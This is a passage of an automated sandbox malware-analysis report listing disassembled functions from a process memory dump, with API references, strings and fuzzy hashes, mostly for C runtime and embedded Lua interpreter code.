                                                                                                                                                                                                                              • API String ID: 3458911817-0
                                                                                                                                                                                                                              • Opcode ID: e26427f5b20f62ba883876fd1f06ab4d7f91d3ecd8fd6feb52cbceae43215d72
                                                                                                                                                                                                                              • Instruction ID: cc4142a7acb1498b2b6d8e41bcd98b0ba0c0c9ec7d533383b06c4c5f0fa8a658
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e26427f5b20f62ba883876fd1f06ab4d7f91d3ecd8fd6feb52cbceae43215d72
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F661A436A08A4A86E710DF21E9A11BD7760FB687C4F44453BFA0DC7A96DF3EE4618740
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE5328FC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 244COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                                              • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                              • Opcode ID: cf0eb1f6ca2243066e125b98a8636c984bae825e280b544a8dfa0c66d0da31ad
                                                                                                                                                                                                                              • Instruction ID: a6ed46af43eb0569fe188ec2e6a85c16dcd028cd08156e56ac48d3d178bfe77b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf0eb1f6ca2243066e125b98a8636c984bae825e280b544a8dfa0c66d0da31ad
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8491152AE08A5A46EB209F26C46027E6755EF60BD4F504137FE8C87AD5DF3ED4A28740
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE529934 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoLocaletry_get_function
                                                                                                                                                                                                                              • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                              • API String ID: 2200034068-2904428671
                                                                                                                                                                                                                              • Opcode ID: a8adcd7e54948543df789bc64a85044cfa450465654c10d4f6e6755c4c701500
                                                                                                                                                                                                                              • Instruction ID: 5a0a8d3645a4ee3c8d4f2486946d1a01534bdf61cb4759bdf26b94f71a13cf4d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8adcd7e54948543df789bc64a85044cfa450465654c10d4f6e6755c4c701500
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A016D25B08B4A81E7109B16B4604AEA660BBBABD0F584037FE5C97B59CE3DD5218780
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE529D50 Relevance: 36.8, APIs: 10, Strings: 11, Instructions: 57COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6DE529D6B
                                                                                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6DE529D8A
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DE529378: GetProcAddress.KERNEL32(?,?,00000002,00007FF6DE529856,?,?,?,00007FF6DE52AB66,?,?,?,00007FF6DE51AF01), ref: 00007FF6DE5294D0
                                                                                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6DE529DA9
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DE529378: LoadLibraryW.KERNELBASE(?,?,00000002,00007FF6DE529856,?,?,?,00007FF6DE52AB66,?,?,?,00007FF6DE51AF01), ref: 00007FF6DE52941B
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DE529378: GetLastError.KERNEL32(?,?,00000002,00007FF6DE529856,?,?,?,00007FF6DE52AB66,?,?,?,00007FF6DE51AF01), ref: 00007FF6DE529429
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DE529378: LoadLibraryExW.KERNEL32(?,?,00000002,00007FF6DE529856,?,?,?,00007FF6DE52AB66,?,?,?,00007FF6DE51AF01), ref: 00007FF6DE52946B
                                                                                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6DE529DC8
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DE529378: FreeLibrary.KERNEL32(?,?,00000002,00007FF6DE529856,?,?,?,00007FF6DE52AB66,?,?,?,00007FF6DE51AF01), ref: 00007FF6DE5294A4
                                                                                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6DE529DE7
                                                                                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6DE529E06
                                                                                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6DE529E25
                                                                                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6DE529E44
                                                                                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6DE529E63
                                                                                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6DE529E82
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                              • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                                                                                                                                                                                              • API String ID: 3255926029-3252031757
                                                                                                                                                                                                                              • Opcode ID: 08f7e19246d0e55c8c0c643605134dc751b4da3462cbaba9e9df61be8aca2df6
                                                                                                                                                                                                                              • Instruction ID: 01a249541f617db49e68adc8047904d05f810ef26867e4b98340fc899923c4af
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08f7e19246d0e55c8c0c643605134dc751b4da3462cbaba9e9df61be8aca2df6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED3177A490CA4FA1F604DB94E8705F82321ABF93D4FC05433F14D962A5DE7EA679C380
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE498590 Relevance: 33.4, APIs: 2, Strings: 17, Instructions: 117COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wcsxfrm$_free_nolock
                                                                                                                                                                                                                              • String ID: .\?.dll;!\?.dll;!\loadall.dll$.\?.lua;!\lua\?.lua;!\lua\?\init.lua;$LUA_CPATH$LUA_NOENV$LUA_PATH$\;?!-$_LOADED$_LOADLIB$_PRELOAD$__gc$config$cpath$loaded$loaders$package$path$preload
                                                                                                                                                                                                                              • API String ID: 338564694-1474762456
                                                                                                                                                                                                                              • Opcode ID: 567adbf67685013490825193ac147204f22a5be4c67c6fdfc6ce4f3ce722572e
                                                                                                                                                                                                                              • Instruction ID: 4ad8ea29c3989ff533d1d693bd30e24187c19aafa58df605760c96960ce67420
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 567adbf67685013490825193ac147204f22a5be4c67c6fdfc6ce4f3ce722572e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D517361A2898782E710EB69E9512BEA360FFD47A0F400237F95DC76A9CF7DD411C780
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE467CA0 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 174COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wcsxfrm
                                                                                                                                                                                                                              • String ID: %s:$...$[builtin#%d]:$ at %p$ in function '%s'$ in function <%s:%d>$ in main chunk$%d:$%s$Snlf$stack traceback:
                                                                                                                                                                                                                              • API String ID: 1214967616-750625491
                                                                                                                                                                                                                              • Opcode ID: dad8c19f1df65b98f19272fbb915c4e626c507869c5506c0b5815d88a20289f3
                                                                                                                                                                                                                              • Instruction ID: 7f6e893c9c1c8cb09b6e1e4a3aab2e28b1caeab8a13787c26076a4e97b3108c1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dad8c19f1df65b98f19272fbb915c4e626c507869c5506c0b5815d88a20289f3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E913A626186C786DB70CB15E4903AEB7A0F7D8790F508637EA9D87B68CE7CD454CB40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE497E50 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 225COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free_nolockwcsftime
                                                                                                                                                                                                                              • String ID: day$hour$isdst$min$month$sec$wday$yday$year
                                                                                                                                                                                                                              • API String ID: 793903186-297742768
                                                                                                                                                                                                                              • Opcode ID: 2aaffe12b0db6b9518b4475245139ff0e0a880d6dad9045458ec8c24c5b8c61e
                                                                                                                                                                                                                              • Instruction ID: c6442dfa577c634e3a68f79270972b5fb3d32c3af2df3babe44fcd2397a89428
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2aaffe12b0db6b9518b4475245139ff0e0a880d6dad9045458ec8c24c5b8c61e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AC12C36618B8685DB60CB19E99036EB7A0FBD9BD4F504136EA8D87B69DF3CD450CB00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE47E5D0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 52libraryloaderthreadCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$CreateCriticalInitializeLibraryLoadSectionThread
                                                                                                                                                                                                                              • String ID: timeBeginPeriod$timeEndPeriod$winmm.dll
                                                                                                                                                                                                                              • API String ID: 4260375681-184456188
                                                                                                                                                                                                                              • Opcode ID: cc04c540dfdcd993c93d582994d185e799fa4b9f9365148040414810b697b9ff
                                                                                                                                                                                                                              • Instruction ID: 0c5fc87ddb47f8640650b9db6fde2b60eb1a870f52b13959f3824cb51d6c4b19
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc04c540dfdcd993c93d582994d185e799fa4b9f9365148040414810b697b9ff
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8221B736908B8582EB109B19E49436E7371F7D5B84F600137EA4D87768DF7ED8A5C740
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE52215C Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 479COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: -$f$p$p
                                                                                                                                                                                                                              • API String ID: 3215553584-2516539321
                                                                                                                                                                                                                              • Opcode ID: 2e035ac35fe9b102a8f7191a604ce257ebae7614de89db9076753e014526f37d
                                                                                                                                                                                                                              • Instruction ID: f67e1d37e5c1a3e28b48add57492080596192c68a003758ea9d1ce59bd51199e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e035ac35fe9b102a8f7191a604ce257ebae7614de89db9076753e014526f37d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C812912EE0C14B86FB349A15D06427D7691FB707A4FD88233F699866C4DF3EE5A08B50
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE4FF3FC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6DE4FF6AE,?,?,?,00007FF6DE4FF3A0,?,?,00000001,00007FF6DE4FF135), ref: 00007FF6DE4FF481
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF6DE4FF6AE,?,?,?,00007FF6DE4FF3A0,?,?,00000001,00007FF6DE4FF135), ref: 00007FF6DE4FF48F
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6DE4FF6AE,?,?,?,00007FF6DE4FF3A0,?,?,00000001,00007FF6DE4FF135), ref: 00007FF6DE4FF4B9
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF6DE4FF6AE,?,?,?,00007FF6DE4FF3A0,?,?,00000001,00007FF6DE4FF135), ref: 00007FF6DE4FF4FF
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF6DE4FF6AE,?,?,?,00007FF6DE4FF3A0,?,?,00000001,00007FF6DE4FF135), ref: 00007FF6DE4FF50B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                              • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                              • Opcode ID: c3afe34d56b073810ade250f6c7973b9ef5f886303c28095954288b42dbd8d7d
                                                                                                                                                                                                                              • Instruction ID: 3658304cd97ebe67989c60f7624b66a142ebe6485d3118f05f5752483d8cfad0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3afe34d56b073810ade250f6c7973b9ef5f886303c28095954288b42dbd8d7d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A931A221A1A74392EE259F42A81057D62D4FF28FA5F491637FD2D87795EF3CE4618300
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE53F1B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                              • String ID: CONOUT$
                                                                                                                                                                                                                              • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                              • Opcode ID: b0ca9c991d90a88812005bb169e0b0acbdb3826b13817d58da2bb6e22e5a5c46
                                                                                                                                                                                                                              • Instruction ID: dcecb949520f8b058d96b53bce8e4c447c0afae7a818f996f7fa236daf0f5e9f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b0ca9c991d90a88812005bb169e0b0acbdb3826b13817d58da2bb6e22e5a5c46
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E11B635B18A4986E7508B52E86432DB3A0FBA8FE4F400236FA1DC7794CF7DD8648740
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE466760 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 386COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: =[C]$Lua$main
                                                                                                                                                                                                                              • API String ID: 0-2004024069
                                                                                                                                                                                                                              • Opcode ID: 98888c1c1b4fbd91893acc06f877c56911a3da836486efa45674046b72bb33cb
                                                                                                                                                                                                                              • Instruction ID: 83b31aeafa6c84047e742775587994957579ccefa2dbfa583a2d278bd5f9fb46
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98888c1c1b4fbd91893acc06f877c56911a3da836486efa45674046b72bb33cb
